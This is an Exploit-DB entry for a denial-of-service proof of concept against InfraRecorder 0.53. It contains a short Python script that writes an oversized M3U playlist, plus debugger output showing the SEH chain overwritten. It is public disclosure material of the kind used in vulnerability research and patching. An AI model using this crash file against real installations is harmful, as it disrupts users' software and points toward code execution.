InfraRecorder 0.53 - Memory Corruption (Denial of Service)

EDB-ID:

32707

CVE:

EDB Verified:

Author:

sajith

Type:

dos

Exploit: /

Platform:

Windows

Date:

2014-04-06

Vulnerable App:

###########################################################
[~] Exploit Title: InfraRecorder  Memory Corruption Exploit [DOS]
[~] Author: sajith
[~] version: version 0.53
[~] vulnerable app link:
http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
[~]Tested in windows Xp sp3,english
###########################################################

raw_input("hit enter to fuzz")

print "poc by sajith shetty"

try:
	f = open("test.m3u","w")
	junk = "\x41" * 5000
	f.write(junk)
	print "done"
except Exception, e:
	print "[+]error - " + str(e)



#edit > import > test.m3u
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00157980 ebx=00b60000 ecx=108b1175 edx=00410041 esi=00410039
edi=00000113
#eip=7c910efe esp=0012c828 ebp=0012ca48 iopl=0         nv up ei pl zr na pe
nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
#ntdll!wcsncpy+0x99f:
#7c910efe 8b39            mov     edi,dword ptr [ecx]
 ds:0023:108b1175=????????
#0:000> !exchain
#0012ca38: ntdll!strchr+113 (7c90e900)
#0012cab8: *** ERROR: Module load completed but symbols could not be loaded
for C:\Program Files\InfraRecorder\infrarecorder.exe
#infrarecorder+ba5b0 (004ba5b0)
#0012d07c: infrarecorder+10041 (00410041)
#Invalid exception stack at 00410041

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services